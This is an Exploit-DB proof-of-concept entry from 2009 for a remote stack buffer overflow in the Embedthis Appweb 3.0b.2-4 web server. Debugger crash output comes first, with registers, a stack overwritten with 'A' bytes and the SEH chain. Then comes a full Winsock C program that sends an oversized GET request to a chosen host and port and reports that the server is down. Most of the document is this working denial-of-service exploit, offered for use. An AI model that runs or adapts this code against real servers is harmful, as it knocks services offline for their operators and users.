Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow (PoC)

EDB-ID:

9411

CVE:

N/A

Author:

fl0 fl0w

Type:

dos

Platform:

Windows

Published:

2009-08-11

    /***************************************************************************************
    Embedthis Appweb Remote Stack Buffer Overflow Poc
    Embedthis Appweb Debugging Info
    -------------------------------

    ASM INSTRUCTIONS
    ----------------
    100076CD   8B0A             MOV ECX,DWORD PTR DS:[EDX]
    100076CF   8B50 10          MOV EDX,DWORD PTR DS:[EAX+10]
    100076D2   51               PUSH ECX
    100076D3   52               PUSH EDX
    100076D4   68 14040110      PUSH libappwe.10010414                   ; ASCII "%s %s %s"
    100076D9   55               PUSH EBP
    100076DA   E8 29630000      CALL <JMP.&libmpr.mprPutFmtToBuf>

    DS:[00000000]=???
    ECX=00000000

    CPU Registers
    --------------
    EAX 01550080
    ECX 00000000
    EDX 00000000
    EBX 00000072
    ESP 0012FD08
    EBP 01550598
    ESI 00837567 ASCII "" %>s %b"
    EDI 01320080
    EIP 100076CD libappwe.100076CD
    C 1  ES 0023 32bit 0(FFFFFFFF)
    P 0  CS 001B 32bit 0(FFFFFFFF)
    A 1  SS 0023 32bit 0(FFFFFFFF)
    Z 0  DS 0023 32bit 0(FFFFFFFF)
    S 1  FS 003B 32bit 7FFDF000(FFF)
    T 0  GS 0000 NULL
    D 0
    O 0  LastErr ERROR_MOD_NOT_FOUND (0000007E)
    EFL 00000293 (NO,B,NE,BE,S,PO,L,LE)
    ST0 empty -??? FFFF 00000000 144C1A7A
    ST1 empty -??? FFFF 00000000 109C62C7
    ST2 empty -??? FFFF 0F3C475C 45A4876F
    ST3 empty -??? FFFF 109C62C7 41264D5E
    ST4 empty -??? FFFF 09AC2DB5 50CE16BD
    ST5 empty -??? FFFF 00000000 17D51378
    ST6 empty 0.0
    ST7 empty 0.0
               3 2 1 0      E S P U O Z D I
    FST 0007  Cond 0 0 0 0  Err 0 0 0 0 0 1 1 1  (GT)
    FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

    Stack
    ------
    <---------------Corruption starts here
    0012FBB8   41414141  AAAA
    0012FBBC   41414141  AAAA
    0012FBC0   41414141  AAAA
    0012FBC4   41414141  AAAA
    0012FBC8   41414141  AAAA
    0012FBCC   41414141  AAAA
    0012FBD0   41414141  AAAA
    0012FBD4   41414141  AAAA
    0012FBD8   41414141  AAAA
    0012FBDC   41414141  AAAA
    0012FBE0   41414141  AAAA
    0012FBE4   41414141  AAAA
    0012FBE8   41414141  AAAA
    0012FBEC   41414141  AAAA
    0012FBF0   41414141  AAAA
    0012FBF4   41414141  AAAA
    0012FBF8   41414141  AAAA
    0012FBFC   41414141  AAAA
    0012FC00   41414141  AAAA
    0012FC04   41414141  AAAA
    0012FC08   41414141  AAAA
    0012FC0C   41414141  AAAA
    0012FC10   41414141  AAAA
    0012FC14   41414141  AAAA
    0012FC18   41414141  AAAA
    0012FC1C   41414141  AAAA
    0012FC20   41414141  AAAA
    0012FC24   41414141  AAAA
    0012FC28   7C91005D  ].‘|  ntdll.7C91005D
.
    0012FC30   00000000  ....
    0012FC34   0002075C  \ .  UNICODE "\Embedthis Appweb\bin\appweb.exe"
    0012FC38   00000000  ....
    0012FC3C   00000000  ....
    0012FC40   00000000  ....
    Seh chain 
    ----------
    SEH chain of main thread, item 2
    Address=0012FFB0
    SE handler=appweb.004020B5
    Software info
    --------------
    Appweb is an embedded web server for the efficient hosting of web applications and frameworks. 
    It is blazing fast and has an extensive set of features. Appweb is optimized for hosting dynamic 
    web applications via an event-driven, multi-threaded core to deliver rapid response, fast throughput
    and effective memory utilization. It is compact and will embed using as little as 800K of memory......
    http://www.embedthis.com/products/appweb/embedded-web-server.html
    Download product
    -----------------
    http://www.embedthis.com/downloads/appweb/index.html
    Scenario
    ---------
    A stack buffer overflow occurs when a very long link is sent
    Bug type
    --------
    Buffer Overflow
    HTTP Dos
    Timeline
    --------
    8:08:2009
    Vendor
    -------
    -
    POC
    ----
    Filename
    ---------
    embed.cpp
    Compiler 
    ---------
    Dev-cpp 4.9.9.2
    Credits/Author
    ---------------
    fl0 fl0w
    Greets
    ------
    Hello to my friendz at 
    http://www.skullbox.info 
    www.doyourself.org 
    http://insecurity-ro.org 
   !_30,OSHO,Carcabot,Vlad,Marsu,Expanders,str0ke...
    References
    ----------
    http://sploitz.110mb.com
    DEMO
    ----
    ***********************************************************************
    Embedthis Appweb Remote Stack Overflow POC
    All Credits:fl0 fl0w
    http://www.sploitz.10001mb.com
    ******************************************************************************
    Usage:project1.exe [-h](host) [-p](port) Default Port 80 Default Host 127.0.0.1

    -h       host HTTP server
    -p       port HTTP server

    ------------------------------------------
    You can use the following IP addresses
    Host name is DESKTOP.
    Address 0:192.168.1.2
    ------------------------------------------
    Host name is DESKTOP.
    Address 1:79.119.103.68
    ------------------------------------------
    */
    //START of algorithm
    #include "winsock2.h"
    #include "fstream.h"
    #include <iostream.h>
    #include <getopt.h>
    #pragma comment(lib, "ws2_32")
    #define BUFFERSIZE 900000
    #define DEFAULT_PORT 80
    #define DEFAULT_HOST "127.0.0.1"
    #define COMMAND "GET "

    struct {
                        int  ip;
                        int port;
       }Net;
       
    static char buffer[BUFFERSIZE];
    WSADATA wsadata;
    int doit(int ,char**);
    void Exit(int);
    void Menu(int ,char**);
    void Wait_s(int);
    void Banner();
 
int main(int argc,char *argv[])
{   if (WSAStartup(MAKEWORD(2,0),&wsadata)!= 0){
    printf("%s", WSAGetLastError());
    return -1;
                                               }
    if(argc < 2) {
    system("CLS");     
    Banner();     
    Menu(argc, argv); 
    int a = doit(argc, argv);
    printf("%d", a);
            }
    else {
          int c;
          while((c = getopt(argc, argv, "h:p:o")) != EOF) {
          switch(c) {
                case 'h':
                Net.ip = (int)optarg;
                break;  
                case 'p': 
                Net.port = (int)optarg;
                break; 
                default:
                Banner();               
                }   
                }
                }     
	Net.ip = htonl(inet_addr(argv[1]));
	if (argc == 2){
    Net.port = atoi(argv[2]);
                  }
    else Net.port = DEFAULT_PORT;
    if(!Net.ip || !Net.port) {
    printf("IP && Port not good\n"); 
    Exit(-2);         
                            }
	SOCKET s;
	struct fd_set mask;
	struct timeval timeout; 
	struct sockaddr_in server;
	s = socket(AF_INET,SOCK_STREAM,0);
	if (s == INVALID_SOCKET) { 
    WSAGetLastError();
    WSACleanup();
    return -1;
                             }
	server.sin_family = AF_INET;
	server.sin_addr.s_addr = htonl(Net.ip);
	server.sin_port = htons(Net.port);
	WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
	timeout.tv_sec =  3;
    timeout.tv_usec = 0;
    FD_ZERO(&mask);
    FD_SET(s,&mask);
	switch(select(s+1,NULL,&mask,NULL,&timeout)) {
	case -1: {
    WSAGetLastError();
    closesocket(s);
    return -1;
                 }
	case 0:  {
    closesocket(s);
    return -1;
                 }
	default:
	if(FD_ISSET(s,&mask)) {
	printf("\tConnected\n");
	Wait_s(1000);
	int a, Load;
	Load=1787;
	memset(buffer,0,sizeof(buffer));
	strcat(buffer, COMMAND);
	for (a=0;a<Load;a++){strcat(buffer,"\x41");}
	strcat(buffer," HTTP/1.1\r\n\r\n");
	Wait_s(1000);
    if (send(s,buffer,strlen(buffer),0)==SOCKET_ERROR) { 
    printf("\tPayload not sent ! Server is OFF! \n");
    return -1;
                                                       }
	Wait_s(1000);
	printf("\tPayload sent ! HTTP server is DOWN !\n");
	return 0;
		}
	}
	closesocket(s);
	WSACleanup();
	return 0;
}

void Wait_s(int seconds)
 { Sleep (seconds);  
 }
 
int doit(int, char **)
 {
    char ac[80];
    if (gethostname(ac, sizeof(ac)) == SOCKET_ERROR) {
        printf("Error " , WSAGetLastError());
        return 1;
                                                     }

    struct hostent *phe = gethostbyname(ac);
    if (phe == 0) {
        printf("Bad host lookup.\n");
        return 1;
                   }
    printf("------------------------------------------\n");
    printf("You can use the following IP addresses\n");
    for (int i = 0; phe->h_addr_list[i] != 0; ++i) {
    struct in_addr addr;
    memcpy(&addr, phe->h_addr_list[i], sizeof(struct in_addr));
    printf("\n");
    printf("Host name is %s.\n" ,ac);
    printf("Address %d:%s\n" ,i ,inet_ntoa(addr));
    printf("------------------------------------------\n");
    }
    
    return 0;
 }
void Exit(int t)
 {  exit(t); 
 }  
  
void Menu(int argc, char **argv)
 { fprintf(stderr,
    "Usage:%s [-h](host) [-p](port) Default Port %d Default Host %s\n"
    "\n"
    "-h       host HTTP server\n"
    "-p       port HTTP server\n"
    "\n"
   ,
   argv[0],
   DEFAULT_PORT,
   DEFAULT_HOST);
     }
void Banner()
 { fputs("******************************************************************************\n"
    "Embedthis Appweb Remote Stack Overflow POC\n"
    "All Credits:fl0 fl0w\n"
   "\thttp://www.sploitz.10001mb.com\n"
   "******************************************************************************\n"
   ,stdout);
 }

// milw0rm.com [2009-08-11]